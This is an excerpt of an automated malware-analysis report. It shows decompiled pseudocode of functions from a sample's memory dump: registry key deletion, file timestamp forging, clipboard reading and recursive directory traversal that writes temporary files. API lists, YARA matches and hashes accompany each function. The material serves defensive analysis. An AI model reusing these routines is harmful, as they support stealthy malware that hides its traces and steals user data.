                                    • LoadLibraryA.KERNEL32(ntdll.dll,2405394B,2405B980,?,24053A12,24056642,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000), ref: 24053531
                                    • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 24053552
                                    • GetProcAddress.KERNEL32(00000000,ZwOpenSection), ref: 24053567
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: RtlInitUnicodeString$ZwOpenSection$ntdll.dll
                                    • API String ID: 2238633743-2527063403
                                    • Opcode ID: 74c764fe895b31fd8ffc635cfa556f6c31b92a6b12ecd93a857e87dddaad3bdf
                                    • Instruction ID: c858ca5bb0f7c34774f4b02a9dd1df5d3543f06064f991b9fbde3d4086b0f7ca
                                    • Opcode Fuzzy Hash: 74c764fe895b31fd8ffc635cfa556f6c31b92a6b12ecd93a857e87dddaad3bdf
                                    • Instruction Fuzzy Hash: E9E0ECB18112049FE701AFBAC654B0D7798F715209B801438F104EB918D77D82CC8F60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402B3CC, Relevance: 9.2, APIs: 6, Instructions: 202registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E2402B3CC(char __eax, long __ebx, void* __edi, void* __esi) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				void* _t83;
				void* _t89;
				void* _t95;
				char* _t100;
				long _t107;
				void* _t125;
				void* _t131;
				char* _t136;
				long _t145;
				long _t166;
				void* _t170;
				char _t190;
				void* _t192;
				void* _t194;
				intOrPtr _t195;
				void* _t199;
				void* _t201;
				intOrPtr _t213;
				intOrPtr _t214;

				_t211 = __esi;
				_t210 = __edi;
				_t166 = __ebx;
				_t213 = _t214;
				_t170 = 4;
				do {
					_push(0);
					_push(0);
					_t170 = _t170 - 1;
				} while (_t170 != 0);
				_push(_t170);
				_push(__ebx);
				_v8 = __eax;
				E24013524(_v8);
				_push(_t213);
				_push(0x2402b63d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t214;
				E24013120( &_v20, _v8);
				E24013590(_v20, E24013674(0x2402b654, _v20) - 1, 1,  &_v24);
				E240135D0( &_v20, E24013674(0x2402b654, _v20), 1);
				_t83 = E2401333C(_v20);
				_t190 = _v20;
				_t216 =  *((char*)(_t190 + _t83 - 1)) - 0x5c;
				if( *((char*)(_t190 + _t83 - 1)) != 0x5c) {
					_push( &_v16);
					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, __eflags) + 1);
					_t89 = E2401333C(_v20);
					_pop(_t192);
					E24013590(_v20, _t89, _t192);
					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, __eflags));
					_t95 = E2401333C(_v20);
					_pop(_t194);
					E240135D0( &_v20, _t95, _t194);
					_t100 = E24013534(_v20);
					RegOpenKeyExA(E2402B224(_v24, __ebx, __eflags), _t100, 0, 2,  &_v12);
					_t107 = RegDeleteValueA(_v12, E24013534(_v16));
					_t107 = _t107 == 0;
				} else {
					E24013590(_v20, E2401333C(_v20) - 1, 1,  &_v20);
					_push( &_v16);
					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, _t216) + 1);
					_t125 = E2401333C(_v20);
					_pop(_t199);
					E24013590(_v20, _t125, _t199);
					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, _t216));
					_t131 = E2401333C(_v20);
					_pop(_t201);
					E240135D0( &_v20, _t131, _t201);
					_t136 = E24013534(_v20);
					RegOpenKeyExA(E2402B224(_v24, __ebx, _t216), _t136, 0, 0x20006,  &_v12);
					E2402A9BC(_v8, __ebx,  &_v32, __edi, __esi, _t216);
					if(_v32 != 0) {
						E2402A9BC(_v8, __ebx,  &_v28, _t210, _t211, __eflags);
						while(1) {
							_t145 = E24013674(0x2402b660, _v28);
							__eflags = _t145;
							if(_t145 <= 0) {
								break;
							}
							_push(_v8);
							E24013590(_v28, E24013674(0x2402b660, _v28) - 1, 1,  &_v40);
							_push(_v40);
							_push(0x2402b654);
							E240133FC();
							_t166 = E2402B3CC(_v36, _t166, _t210, _t211);
							__eflags = _t166;
							if(_t166 != 0) {
								E240135D0( &_v28, E24013674(0x2402b660, _v28), 1);
								continue;
							}
							break;
						}
						__eflags = RegDeleteKeyA(_v12, E24013534(_v16));
					} else {
						RegDeleteKeyA(_v12, E24013534(_v16));
					}
				}
				RegCloseKey(_v12);
				_pop(_t195);
				 *[fs:eax] = _t195;
				_push(0x2402b644);
				E240130AC( &_v40, 7);
				return E24013088( &_v8);
			}































                                    0x2402b3cc
                                    0x2402b3cc
                                    0x2402b3cc
                                    0x2402b3cd
                                    0x2402b3cf
                                    0x2402b3d4
                                    0x2402b3d4
                                    0x2402b3d6
                                    0x2402b3d8
                                    0x2402b3d8
                                    0x2402b3db
                                    0x2402b3dc
                                    0x2402b3dd
                                    0x2402b3e3
                                    0x2402b3ea
                                    0x2402b3eb
                                    0x2402b3f0
                                    0x2402b3f3
                                    0x2402b3fc
                                    0x2402b41d
                                    0x2402b439
                                    0x2402b441
                                    0x2402b446
                                    0x2402b449
                                    0x2402b44e
                                    0x2402b59d
                                    0x2402b5a9
                                    0x2402b5ad
                                    0x2402b5b7
                                    0x2402b5b8
                                    0x2402b5c7
                                    0x2402b5cb
                                    0x2402b5d5
                                    0x2402b5d6
                                    0x2402b5e6
                                    0x2402b5f5
                                    0x2402b607
                                    0x2402b60e
                                    0x2402b454
                                    0x2402b46b
                                    0x2402b473
                                    0x2402b47f
                                    0x2402b483
                                    0x2402b48d
                                    0x2402b48e
                                    0x2402b49d
                                    0x2402b4a1
                                    0x2402b4ab
                                    0x2402b4ac
                                    0x2402b4bf
                                    0x2402b4ce
                                    0x2402b4d9
                                    0x2402b4e2
                                    0x2402b506
                                    0x2402b570
                                    0x2402b578
                                    0x2402b57d
                                    0x2402b57f
                                    0x00000000
                                    0x00000000
                                    0x2402b50d
                                    0x2402b52c
                                    0x2402b531
                                    0x2402b534
                                    0x2402b541
                                    0x2402b54e
                                    0x2402b550
                                    0x2402b552
                                    0x2402b56b
                                    0x00000000
                                    0x2402b56b
                                    0x00000000
                                    0x2402b552
                                    0x2402b593
                                    0x2402b4e4
                                    0x2402b4f1
                                    0x2402b4f8
                                    0x2402b4e2
                                    0x2402b615
                                    0x2402b61c
                                    0x2402b61f
                                    0x2402b622
                                    0x2402b62f
                                    0x2402b63c

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020006,?,?,?,?,00000000,2402B63D,?,?,00000003,00000000,00000000), ref: 2402B4CE
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402B4F1
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402B63D,?,?,00000003,00000000), ref: 2402B615
                                      • Part of subcall function 2402A9BC: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000008,?,00000000,2402AB1D), ref: 2402AA71
                                      • Part of subcall function 2402A9BC: RegEnumKeyExA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000008,?,00000000), ref: 2402AAD4
                                      • Part of subcall function 2402A9BC: RegCloseKey.ADVAPI32(?,?,00000001,00000000,000000FF,00000000,00000000,00000000,?,?,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 2402AAE1
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402B58E
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000002,?,?,?,00000000,2402B63D,?,?,00000003,00000000,00000000), ref: 2402B5F5
                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402B63D,?,?,00000003,00000000,00000000), ref: 2402B607
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpen$Close$EnumValue
                                    • String ID:
                                    • API String ID: 1347035672-0
                                    • Opcode ID: 1a16aab594e43fda11bd511c9af2b6ffd4e7b86e5d0c95d23673eeaef833f57f
                                    • Instruction ID: d9a6e5a07206ec87fe685ba73a328b74744f1f67cc39b348b4af9fb8c1011764
                                    • Opcode Fuzzy Hash: 1a16aab594e43fda11bd511c9af2b6ffd4e7b86e5d0c95d23673eeaef833f57f
                                    • Instruction Fuzzy Hash: B7610D71A005199BFF00EBB4D884AEFB7F9FF68308F504461E519E7298DA74EE858B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402BC2C, Relevance: 9.1, APIs: 6, Instructions: 138registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 38%
                                    			E2402BC2C(void* __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				char* _v8;
				void* _v12;
				char _v16;
				int _v20;
				int _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				void* __ecx;
				char* _t65;
				intOrPtr _t99;
				void* _t101;
				void* _t102;
				void* _t114;
				intOrPtr _t115;
				char* _t119;
				void* _t121;
				char* _t122;
				intOrPtr _t124;
				intOrPtr _t125;

				_t124 = _t125;
				_t99 = 5;
				do {
					_push(0);
					_push(0);
					_t99 = _t99 - 1;
					_t126 = _t99;
				} while (_t99 != 0);
				_t1 =  &_v8;
				 *_t1 = _t99;
				_push(__ebx);
				_v8 =  *_t1;
				_t119 = __edx;
				_t121 = __eax;
				_push(_t124);
				_push(0x2402bd96);
				_push( *[fs:eax]);
				 *[fs:eax] = _t125;
				_push( &_v16);
				E24013274( &_v28, __eax);
				_push(E24013674(0x2402bdb0, _v28) - 1);
				E24013274( &_v32, _t121);
				_pop(_t101);
				E24013590(_v32, _t101, 1);
				_push( &_v12);
				_push(0x2001b);
				_push(0);
				_push( &_v36);
				E24013274( &_v40, _t121);
				_push(E24013674(0x2402bdb0, _v40) + 1);
				E24013274( &_v44, _t121);
				_push(E2401333C(_v44));
				E24013274( &_v48, _t121);
				_pop(_t102);
				_pop(_t114);
				E24013590(_v48, _t102, _t114);
				_t65 = E24013534(_v36);
				if(RegOpenKeyExA(E2402B224(_v16, 0, _t126), _t65, ??, ??, ??) == 0 && RegQueryValueExA(_v12, _t119, 0,  &_v20, 0,  &_v24) == 0) {
					_t122 = E24011344(_v24);
					if(RegQueryValueExA(_v12, _t119, 0,  &_v20, _t122,  &_v24) == 0 && RegSetValueExA(_v12, _v8, 0, _v20, _t122, _v24) == 0) {
						RegDeleteValueA(_v12, _t119);
					}
					E2401135C(_t122);
				}
				RegCloseKey(_v12);
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x2402bd9d);
				E240130AC( &_v48, 6);
				return E24013088( &_v16);
			}


























                                    0x2402bc2d
                                    0x2402bc30
                                    0x2402bc35
                                    0x2402bc35
                                    0x2402bc37
                                    0x2402bc39
                                    0x2402bc39
                                    0x2402bc39
                                    0x2402bc3c
                                    0x2402bc3c
                                    0x2402bc3f
                                    0x2402bc42
                                    0x2402bc45
                                    0x2402bc47
                                    0x2402bc4b
                                    0x2402bc4c
                                    0x2402bc51
                                    0x2402bc54
                                    0x2402bc5c
                                    0x2402bc62
                                    0x2402bc75
                                    0x2402bc7b
                                    0x2402bc88
                                    0x2402bc89
                                    0x2402bc91
                                    0x2402bc92
                                    0x2402bc97
                                    0x2402bc9c
                                    0x2402bca2
                                    0x2402bcb5
                                    0x2402bcbb
                                    0x2402bcc8
                                    0x2402bcce
                                    0x2402bcd6
                                    0x2402bcd7
                                    0x2402bcd8
                                    0x2402bce0
                                    0x2402bcf6
                                    0x2402bd1a
                                    0x2402bd33
                                    0x2402bd56
                                    0x2402bd5d
                                    0x2402bd65
                                    0x2402bd65
                                    0x2402bd6e
                                    0x2402bd75
                                    0x2402bd78
                                    0x2402bd7b
                                    0x2402bd88
                                    0x2402bd95

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,?,00000000,0002001B,?,?,00000000,2402BD96,?,?,?,?,00000000,00000000), ref: 2402BCEF
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00000000,?,00000000,0002001B,?,?,00000000,2402BD96), ref: 2402BD09
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,00000000,00000000,?,00000000), ref: 2402BD2C
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?,00000000,?), ref: 2402BD48
                                    • RegDeleteValueA.ADVAPI32(?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 2402BD56
                                    • RegCloseKey.ADVAPI32(?,00000000,00000000,?,00000000,0002001B,?,?,00000000,2402BD96,?,?,?,?,00000000,00000000), ref: 2402BD6E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$Query$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 2877093821-0
                                    • Opcode ID: c7ff51e8ca8b2579c96f1e29e8fed98b9275706cd8d17edbd4f7862de7d64363
                                    • Instruction ID: a69a4bea8592afac0528f589063a7326b1332b86241eadad387ec09b713e22e2
                                    • Opcode Fuzzy Hash: c7ff51e8ca8b2579c96f1e29e8fed98b9275706cd8d17edbd4f7862de7d64363
                                    • Instruction Fuzzy Hash: BD41ED76A00518ABEF01DAA4D980FEFB7FCEF58604F504566E904F7254EA74EE818B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24017578, Relevance: 9.1, APIs: 6, Instructions: 73filetimeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E24017578(intOrPtr __eax, void* __ebx, void* __edx, void* __esi) {
				intOrPtr _v4;
				char _v8;
				struct _FILETIME _v16;
				intOrPtr _v117;
				void* _t45;
				intOrPtr _t49;
				CHAR* _t51;
				void* _t54;

				_pop(_t54);
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_v4 = __eax;
				E24013524(_v4);
				_push(_t54);
				_push(0x24017659);
				_push( *[fs:eax]);
				 *[fs:eax] = _t54 + 0xfffffff4;
				E24011644();
				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
				_v8 = E24011D10(0x1869f) + 0x1c52fa0;
				_t51 = E24013534(_v4);
				_t45 = CreateFileA(_t51, 0x40000000, 3, 0, 3, 0x80, 0);
				if(_t45 != 0xffffffff) {
					SetFileTime(_t45,  &_v16,  &_v16,  &_v16);
				} else {
					CloseHandle(_t45);
					_t45 = CreateFileA(_t51, 0x40000000, 3, 0, 3, 4, 0);
					if(_t45 != 0xffffffff) {
						SetFileTime(_t45,  &_v16,  &_v16,  &_v16);
					}
					CloseHandle(_t45);
				}
				CloseHandle(_t45);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E24017660);
				return E24013088( &_v8);
			}











                                    0x24017578
                                    0x24017579
                                    0x2401757b
                                    0x24017584
                                    0x2401758a
                                    0x24017591
                                    0x24017592
                                    0x24017597
                                    0x2401759a
                                    0x2401759d
                                    0x240175b1
                                    0x240175c3
                                    0x240175e0
                                    0x240175e8
                                    0x240175ed
                                    0x24017638
                                    0x240175ef
                                    0x240175f0
                                    0x2401760a
                                    0x2401760f
                                    0x2401761e
                                    0x2401761e
                                    0x24017624
                                    0x24017624
                                    0x2401763e
                                    0x24017645
                                    0x24017648
                                    0x2401764b
                                    0x24017658

                                    APIs
                                      • Part of subcall function 24011644: GetSystemTime.KERNEL32(?), ref: 2401164E
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175E3
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175F0
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 24017605
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000), ref: 2401761E
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000), ref: 24017624
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 24017638
                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 2401763E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleTime$Create$System
                                    • String ID:
                                    • API String ID: 1407650207-0
                                    • Opcode ID: 8734682c1186f0dd38638350a5d904f5abe7541b1a56a7ff21a9356337d0594a
                                    • Instruction ID: 1ae059303b93140b314969ef159fa4e1e083943449f6f8d28b21c5887aae9a2f
                                    • Opcode Fuzzy Hash: 8734682c1186f0dd38638350a5d904f5abe7541b1a56a7ff21a9356337d0594a
                                    • Instruction Fuzzy Hash: E311E6B0A00604BEF752A774EC92F9E7BECDB19618F500261F218FB5D5DA746F804B14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403CEFC, Relevance: 9.1, APIs: 6, Instructions: 69clipboardCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E2403CEFC(struct HWND__* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				struct HWND__* _t38;
				void* _t42;
				intOrPtr _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				intOrPtr _t54;

				_t51 = _t53;
				_t54 = _t53 + 0xfffffff4;
				_v8 = __edx;
				_t38 = __eax;
				_v9 = 1;
				E24013088(_v8);
				if(OpenClipboard(_t38) == 0) {
					_v9 = 0;
					return _v9;
				} else {
					_push(_t51);
					_push(0x2403cfb3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t54;
					_v16 = GetClipboardData(1);
					_t57 = _v16;
					if(_v16 == 0) {
						_v9 = 0;
						E24013274(_v8, E24013588(_v8));
						__eflags = 0;
						_pop(_t47);
						 *[fs:eax] = _t47;
						_push(0x2403cfbe);
						return CloseClipboard();
					} else {
						_push(_t51);
						_push(0x2403cf83);
						_push( *[fs:eax]);
						 *[fs:eax] = _t54;
						_push(GlobalSize(_v16));
						_t31 = _v16;
						GlobalFix(_v16);
						_pop(_t42);
						E24013174(_v8, _t42, _t31, _t57);
						_pop(_t49);
						 *[fs:eax] = _t49;
						_push(0x2403cf8e);
						return GlobalUnWire(_v16);
					}
				}
			}













                                    0x2403cefd
                                    0x2403ceff
                                    0x2403cf03
                                    0x2403cf06
                                    0x2403cf08
                                    0x2403cf0f
                                    0x2403cf1c
                                    0x2403cfba
                                    0x2403cfc5
                                    0x2403cf22
                                    0x2403cf24
                                    0x2403cf25
                                    0x2403cf2a
                                    0x2403cf2d
                                    0x2403cf37
                                    0x2403cf3a
                                    0x2403cf3e
                                    0x2403cf8a
                                    0x2403cf9b
                                    0x2403cfa0
                                    0x2403cfa2
                                    0x2403cfa5
                                    0x2403cfa8
                                    0x2403cfb2
                                    0x2403cf40
                                    0x2403cf42
                                    0x2403cf43
                                    0x2403cf48
                                    0x2403cf4b
                                    0x2403cf57
                                    0x2403cf58
                                    0x2403cf5c
                                    0x2403cf66
                                    0x2403cf67
                                    0x2403cf6e
                                    0x2403cf71
                                    0x2403cf74
                                    0x2403cf82
                                    0x2403cf82
                                    0x2403cf3e

                                    APIs
                                    • OpenClipboard.USER32 ref: 2403CF15
                                    • GetClipboardData.USER32(00000001), ref: 2403CF32
                                    • GlobalSize.KERNEL32(00000000), ref: 2403CF52
                                    • GlobalFix.KERNEL32(00000000), ref: 2403CF5C
                                    • GlobalUnWire.KERNEL32(00000000), ref: 2403CF7D
                                    • CloseClipboard.USER32 ref: 2403CFAD
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ClipboardGlobal$CloseDataOpenSizeWire
                                    • String ID:
                                    • API String ID: 3291160196-0
                                    • Opcode ID: 69fb62113d829d6ca270af2b7ba2215a12206daf402cbe7ea6700773f36177ba
                                    • Instruction ID: cdefa8330f274483a339700c40cb4629a957fdacaa4e905b19683dc927ff64c5
                                    • Opcode Fuzzy Hash: 69fb62113d829d6ca270af2b7ba2215a12206daf402cbe7ea6700773f36177ba
                                    • Instruction Fuzzy Hash: A211D631908204BFEB01DBF5D861B9EBFF8EB59304F9144B0F408D3644DA759E80DA61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24042DC8, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 268sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E24042DC8(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v24;
				char _v300;
				void _v344;
				intOrPtr _v356;
				signed int _v360;
				char _v368;
				char _v624;
				char _v880;
				void _v1200;
				char _v1204;
				char _v1208;
				char _v1212;
				char _v1468;
				char _v1724;
				char _v1728;
				char _v1732;
				char _v1736;
				char _v1740;
				char _v1744;
				char _v1748;
				char _v1752;
				char _v1756;
				char _v1760;
				void* __ecx;
				void* _t95;
				void* _t101;
				signed int _t105;
				signed int _t118;
				signed int _t121;
				signed int _t174;
				void* _t202;
				intOrPtr _t205;
				intOrPtr _t239;
				char _t244;
				intOrPtr _t247;
				intOrPtr _t250;
				intOrPtr _t255;
				void* _t265;
				intOrPtr _t274;
				intOrPtr _t283;
				intOrPtr _t293;
				intOrPtr _t294;

				_t290 = __esi;
				_t286 = __edi;
				_t293 = _t294;
				_t205 = 0xdb;
				do {
					_push(0);
					_push(0);
					_t205 = _t205 - 1;
				} while (_t205 != 0);
				_t1 =  &_v8;
				 *_t1 = _t205;
				_push(__esi);
				_push(__edi);
				_v9 =  *_t1;
				_v8 = __edx;
				_t202 = __eax;
				_t239 =  *0x24015a98; // 0x24015a9c
				E240139CC( &_v368, _t239);
				_push(_t293);
				_push(0x240431f8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t294;
				E24013120( &_v16, _t202);
				_t95 = E24013674(0x24043210, _v16);
				E24013590(_v16, _t95 != 1, 1,  &_v1204);
				E24013480(_v1204, 0x2404321c);
				if(_t95 != 1) {
					_t101 = E2401333C(_v16);
					_t244 = _v16;
					__eflags =  *((char*)(_t244 + _t101 - 1)) - 0x5c;
					if( *((char*)(_t244 + _t101 - 1)) != 0x5c) {
						E24013344( &_v16, 0x24043228);
					}
					E24013388( &_v1212, _v8, _v16);
					_t105 = E240163E8(_v1212,  &_v368, 0x2f);
					__eflags = _t105;
					if(_t105 != 0) {
						__eflags = _v9;
						if(_v9 == 0) {
							goto L23;
						} else {
							E24013388( &_v1756, 0x24043244, _v16);
							_t118 = E240163E8(_v1756,  &_v368, 0x10);
							__eflags = _t118;
							if(_t118 != 0) {
								goto L23;
							} else {
								__eflags = 0;
								_push(_t293);
								_push(0x240431a5);
								_push( *[fs:eax]);
								 *[fs:eax] = _t294;
								do {
									__eflags = _v360 & 0x00000010;
									if((_v360 & 0x00000010) != 0) {
										E24013480(_v356, 0x24043250);
										if(__eflags != 0) {
											E24013480(_v356, 0x2404325c);
											if(__eflags != 0) {
												E24013388( &_v1760, _v356, _v16);
												E24042DC8(_v1760, _t202, _v8, _t286, _t290);
											}
										}
									}
									_t121 = E24015E5C( &_v368);
									__eflags = _t121;
								} while (_t121 == 0);
								__eflags = 0;
								_pop(_t255);
								 *[fs:eax] = _t255;
								_push(0x240431ac);
								return E24015DDC( &_v368);
							}
						}
					} else {
						__eflags = 0;
						_push(_t293);
						_push(0x240430dc);
						_push( *[fs:eax]);
						 *[fs:eax] = _t294;
						do {
							_t203 = E24012658(1);
							_t291 =  &_v344;
							memcpy( &_v1200,  &_v344, 0x50 << 2);
							_t294 = _t294 + 0xc;
							_push( &_v1468);
							E240132EC( &_v1732, 0x104,  &_v300);
							E240171A8(_v1732, 0x104,  &_v1728);
							E24013318( &_v1724, 0xff, _v1728);
							_push( &_v1724);
							E240132EC( &_v1740, 0x104,  &_v300);
							E24013388( &_v1736, _v1740, _v16);
							_pop(_t265);
							E240404A4(_t135, _t265,  &_v344 + 0xa0,  &_v344, __eflags);
							E24011BD8( &_v880,  &_v1468);
							E24013318( &_v624, 0xff, _v16);
							E24023314(_t135, 0x340,  &_v1200);
							E24023024(_t135, 0x340,  &_v1744);
							E24013344(0x24063270, _v1744);
							E24012688(_t135);
							E24017038( &_v1748);
							_push(_v1748);
							E240158BC( &_v1752, 0x340, 0, GetTickCount(), 0);
							_push(_v1752);
							_push(".tmp");
							E240133FC();
							E24016DA0(_v24, _t203, 0, 0,  &_v344, __eflags);
							E24016634(_v24, _t203,  &_v344 + 0xa0, _t291, __eflags);
							_t174 = E24015E5C( &_v368);
							__eflags = _t174;
						} while (_t174 == 0);
						__eflags = 0;
						_pop(_t274);
						 *[fs:eax] = _t274;
						_push(0x240430e3);
						return E24015DDC( &_v368);
					}
				} else {
					E24013120( &_v20, _v16);
					E240135D0( &_v20, E24013674(0x24043210, _v20), 1);
					while(E24013674(0x24043210, _v20) > 0) {
						Sleep(0x32);
						_push(_t293);
						_push(0x24042ec5);
						_push( *[fs:eax]);
						 *[fs:eax] = _t294;
						E24013590(_v20, E24013674(0x24043210, _v20) - 1, 1,  &_v1208);
						E24042DC8(_v1208, _t202, _v8, _t286, _t290);
						_pop(_t283);
						 *[fs:eax] = _t283;
						E240135D0( &_v20, E24013674(0x24043210, _v20), 1);
					}
					L23:
					_pop(_t247);
					 *[fs:eax] = _t247;
					_push(0x240431ff);
					E240130AC( &_v1760, 9);
					E240130AC( &_v1212, 3);
					_t250 =  *0x24015a98; // 0x24015a9c
					E24013A90( &_v368, _t250);
					return E240130AC( &_v24, 3);
				}
			}

















































                                    0x24042dc8
                                    0x24042dc8
                                    0x24042dc9
                                    0x24042dcc
                                    0x24042dd1
                                    0x24042dd1
                                    0x24042dd3
                                    0x24042dd5
                                    0x24042dd5
                                    0x24042dd8
                                    0x24042dd8
                                    0x24042ddc
                                    0x24042ddd
                                    0x24042dde
                                    0x24042de1
                                    0x24042de4
                                    0x24042dec
                                    0x24042df2
                                    0x24042df9
                                    0x24042dfa
                                    0x24042dff
                                    0x24042e02
                                    0x24042e0a
                                    0x24042e1e
                                    0x24042e2e
                                    0x24042e3e
                                    0x24042e43
                                    0x24042f08
                                    0x24042f0d
                                    0x24042f10
                                    0x24042f15
                                    0x24042f1f
                                    0x24042f1f
                                    0x24042f30
                                    0x24042f46
                                    0x24042f4b
                                    0x24042f4d
                                    0x240430e3
                                    0x240430e7
                                    0x00000000
                                    0x240430ed
                                    0x240430fb
                                    0x24043111
                                    0x24043116
                                    0x24043118
                                    0x00000000
                                    0x2404311e
                                    0x2404311e
                                    0x24043120
                                    0x24043121
                                    0x24043126
                                    0x24043129
                                    0x2404312c
                                    0x2404312c
                                    0x24043133
                                    0x24043140
                                    0x24043145
                                    0x24043152
                                    0x24043157
                                    0x24043168
                                    0x24043178
                                    0x24043178
                                    0x24043157
                                    0x24043145
                                    0x24043183
                                    0x24043188
                                    0x24043188
                                    0x2404318c
                                    0x2404318e
                                    0x24043191
                                    0x24043194
                                    0x240431a4
                                    0x240431a4
                                    0x24043118
                                    0x24042f53
                                    0x24042f53
                                    0x24042f55
                                    0x24042f56
                                    0x24042f5b
                                    0x24042f5e
                                    0x24042f61
                                    0x24042f6d
                                    0x24042f6f
                                    0x24042f80
                                    0x24042f80
                                    0x24042f88
                                    0x24042f9a
                                    0x24042fab
                                    0x24042fc1
                                    0x24042fcc
                                    0x24042fde
                                    0x24042ff2
                                    0x24042fff
                                    0x24043000
                                    0x24043011
                                    0x24043024
                                    0x24043036
                                    0x24043043
                                    0x24043053
                                    0x2404305a
                                    0x24043065
                                    0x2404306a
                                    0x2404307f
                                    0x24043084
                                    0x2404308a
                                    0x24043097
                                    0x240430a3
                                    0x240430ab
                                    0x240430b6
                                    0x240430bb
                                    0x240430bb
